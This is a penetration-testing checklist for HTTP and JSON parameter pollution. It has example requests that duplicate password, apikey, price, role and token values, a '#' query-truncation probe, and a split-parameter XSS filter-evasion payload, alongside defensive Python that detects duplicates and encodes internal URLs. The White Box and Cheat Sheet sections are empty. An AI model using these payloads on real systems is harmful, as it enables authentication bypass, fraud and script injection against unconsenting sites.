HTTP Parameter Pollution
Check List
Methodology
Black Box
Test Query String Pollution
To test for server-side parameter pollution (SSPP) in query strings, insert query syntax characters such as #, & and = into your input and observe how the application responds.

Consider a vulnerable application that searches for users based on their username. The request might look like this:

GET /usernameSearch?name=jack&returningPath=/main

The server translates this to an internal API request:

GET /usernames/search?name=jack#foo&publicProfile=true

If the # is forwarded unencoded, everything after it is treated as a fragment rather than part of the query, so the internal request is truncated and the publicProfile parameter might be bypassed, potentially exposing non-public profiles.
Bypassing Authentication
Prepare a test login endpoint that accepts username and password parameters.

Record a normal login request:

POST /login
username=admin&password=wrongpassword

Send the request with multiple password values:

POST /login
username=admin&password=wrongpassword&password=correctpassword

Inspect the server response and session behavior (cookies). If authentication succeeds because the last or a specific occurrence is processed, HPP is present.
Manipulating SQL Queries (Overwriting id)
Identify the endpoint that reads id and returns a user profile (e.g., /profile?id=...).

Record a normal request and note the response:

GET /profile?id=1

Send a request with duplicated id parameters:

GET /profile?id=1&id=2

Tampering with API Calls (API key parameter)
Identify an API endpoint that uses apikey for authentication (e.g., /api/data?user=123&apikey=...).

Record a request with an invalid key.

Send a request with multiple apikey parameters where a valid key appears last:

GET /api/data?user=123&apikey=invalid-key&apikey=valid-key

Check whether access is granted; if the last parameter is used and access is allowed, HPP is confirmed.
Altering Price Calculations (E-commerce)
Locate the checkout endpoint that accepts a price parameter.

Record a normal purchase request:

POST /checkout
product=123&price=100

Send the request with duplicate price values:

POST /checkout
product=123&price=100&price=1

Verify the server response, cart totals or final calculation; if the last price is applied, resulting in a reduced cost, HPP is present.
Bypassing Input Validation and WAF (XSS evasion)
Identify a point that reflects or stores user input (e.g., a comment parameter).

Note a simple blocked input example:

comment=<script>alert(1)</script>

Send the input as fragmented/duplicated parameter pieces so that server-side reconstruction may bypass the filter, for example:

comment=<scr&comment=ipt>alert(1)</scr&comment=ipt>

HTTP Parameter Pollution (Privilege Escalation)
First, an attacker identifies a vulnerable endpoint that accepts query parameters. This can be done through manual testing or with automated tools like Burp Suite.

Next, the attacker crafts a request with duplicate parameters or adds unexpected parameters to the URL:

https://example.com/api/user?role=admin&role=user

In this case, if the application does not properly validate the ‘role’ parameter, it might grant admin privileges to the user.

The attacker then analyzes the server’s response to see whether the manipulation led to any unexpected behavior. Successful exploitation can result in privilege escalation, information disclosure or even remote code execution, depending on the application’s logic.
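The duplicate-parameter and query-truncation tests above all hinge on how the server parses the query string and how it builds its internal requests. The following Python is an added example, not code from the original checklist: it contrasts a last-wins parse with a strict parser that rejects repeated names, and an unencoded internal URL builder with one that percent-encodes the input. The inputs and function names are constructed for illustration.

```python
from urllib.parse import parse_qsl, urlencode

# Constructed inputs mirroring the test cases above.
LOGIN_QS = "username=admin&password=wrongpassword&password=correctpassword"
SEARCH_INPUT = "jack#foo"  # user-supplied value for the name parameter

class ParameterPollution(ValueError):
    """Raised when a request repeats a parameter name."""

def last_wins(query_string):
    """Reference: a permissive parse that silently keeps the LAST duplicate,
    which is the behavior the duplicate-password and duplicate-price tests probe."""
    return dict(parse_qsl(query_string, keep_blank_values=True))

def parse_strict(query_string):
    """Parse a query string, refusing any parameter that appears more than once.
    Names are compared case-insensitively so Password= cannot shadow password=."""
    params = {}
    for name, value in parse_qsl(query_string, keep_blank_values=True):
        if name.lower() in params:
            raise ParameterPollution(f"parameter {name!r} supplied more than once")
        params[name.lower()] = value
    return params

def is_polluted(query_string):
    """True if the query string would be rejected by parse_strict."""
    try:
        parse_strict(query_string)
    except ParameterPollution:
        return True
    return False

def unsafe_internal_url(name):
    """String concatenation: a '#' in the input ends the query component,
    so the appended publicProfile parameter is never seen by the backend."""
    return "/usernames/search?name=" + name + "&publicProfile=true"

def safe_internal_url(name):
    """urlencode percent-encodes '#', '&' and '=' so the input stays one value."""
    return "/usernames/search?" + urlencode({"name": name, "publicProfile": "true"})

if __name__ == "__main__":
    print(last_wins(LOGIN_QS)["password"])    # correctpassword
    print(is_polluted(LOGIN_QS))              # True
    print(unsafe_internal_url(SEARCH_INPUT))  # ...name=jack#foo&publicProfile=true
    print(safe_internal_url(SEARCH_INPUT))    # ...name=jack%23foo&publicProfile=true
```

Whether the first or the last duplicate wins is parser-specific; logging a rejection from parse_strict also gives a simple detection signal for the probes described in this checklist.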
Broken Access Control
Browse the site and use Burp Suite to identify its entry points.

Identify the initial API endpoint:

GET /api/v1/user/profile?userId=12345

Send a simple request to observe normal server behavior.

Check whether you can access other accounts by adding another parameter as shown below:

GET /api/v1/user/profile?userId=12345&userId=67890

If this gives an error, keep the value constant but still add the duplicate parameter and check the server's behavior:

GET /api/v1/user/profile?userId=12345&userId=12345

JSON Parameter Pollution in Export Process
Look for endpoints that export data in different formats, for example the following request to an API endpoint:

POST /api/admin/exportData
Content-Type: application/json

{"format":"csv","filters":{"userId":12345}}

For this request, check how the server responds if we add another format parameter, for example:

{"format":"csv","format":"json"}

If it returns an error such as the one below:

{"error":"Unexpected token , in JSON at position 15"}

Send the next request using a capitalized key as shown below:

{"format":"csv","Format":"json"}

Response:

{"status":"processing","file":"/exports/data-2023-10-25.json"}

JSON Parameter Pollution (Authentication Bypass)
Perform the authentication flow and intercept the request.

If the request contains parameters such as the following:

POST /api/auth/verify
Content-Type: application/json

{"token":"user_token_123","role":"user"}

Try adding duplicate parameters to the request as shown below:

{"token":"user_token_123","token":"admin_token_abc","role":"user","role":"admin"}

Response:

{"authenticated": true, "user": "admin", "permissions": ["read","write","delete"]}

Test Case in Login Parameter
Browse the site and use Burp Suite to identify its entry points.

Identify the initial JSON API endpoint /api/v1/auth/login and send a simple request to observe normal server behavior:

{
  "username": "alice",
  "password": "pass123"
}

Test HPP by adding duplicate keys as shown below:

{
  "username": "alice",
  "password": "pass123",
  "username": "bob"
}

If the server processes the first value for authentication but the last for updates, keep the key constant but duplicate it and check the server's behavior:

{
  "role": "user",
  "role": "admin"
}

White Box
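Whether the duplicate-key and case-variant JSON tests above succeed depends on how the server's JSON parser resolves repeated keys, which is exactly what a white-box review of the parsing layer should check. The following Python is an added example, not code from the original checklist: it shows that Python's default json.loads keeps the last duplicate, and a strict loader using object_pairs_hook that rejects repeated or case-variant keys. Request bodies and function names are constructed for illustration.

```python
import json

# Constructed request bodies mirroring the JSON tests above.
CLEAN = '{"format":"csv","filters":{"userId":12345}}'
EXPORT_DUP = '{"format":"csv","format":"json"}'
EXPORT_CASE = '{"format":"csv","Format":"json"}'
AUTH_DUP = ('{"token":"user_token_123","token":"admin_token_abc",'
            '"role":"user","role":"admin"}')

class DuplicateKey(ValueError):
    """Raised when a JSON object repeats a key, exactly or in a different case."""

def _reject_duplicates(pairs):
    """object_pairs_hook: json.loads passes every key/value pair of an object,
    in document order, before they are collapsed into a dict, so duplicates
    are still visible here. Keys are compared case-insensitively so that
    "Format" cannot shadow "format". Nested objects go through the same hook."""
    obj, seen = {}, set()
    for key, value in pairs:
        folded = key.casefold()
        if folded in seen:
            raise DuplicateKey(f"duplicate key {key!r}")
        seen.add(folded)
        obj[key] = value
    return obj

def loads_strict(body):
    """Parse a JSON request body, refusing duplicate keys at any depth."""
    return json.loads(body, object_pairs_hook=_reject_duplicates)

def permissive_value(body, key):
    """Reference: the default json.loads keeps the LAST duplicate silently,
    which is what lets "role":"admin" override "role":"user"."""
    return json.loads(body)[key]

def is_polluted(body):
    """True if the body contains a duplicate or case-variant key."""
    try:
        loads_strict(body)
    except DuplicateKey:
        return True
    return False

if __name__ == "__main__":
    print(permissive_value(AUTH_DUP, "role"))   # admin
    for body in (CLEAN, EXPORT_DUP, EXPORT_CASE, AUTH_DUP):
        print(is_polluted(body))                # False True True True
```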
Cheat Sheet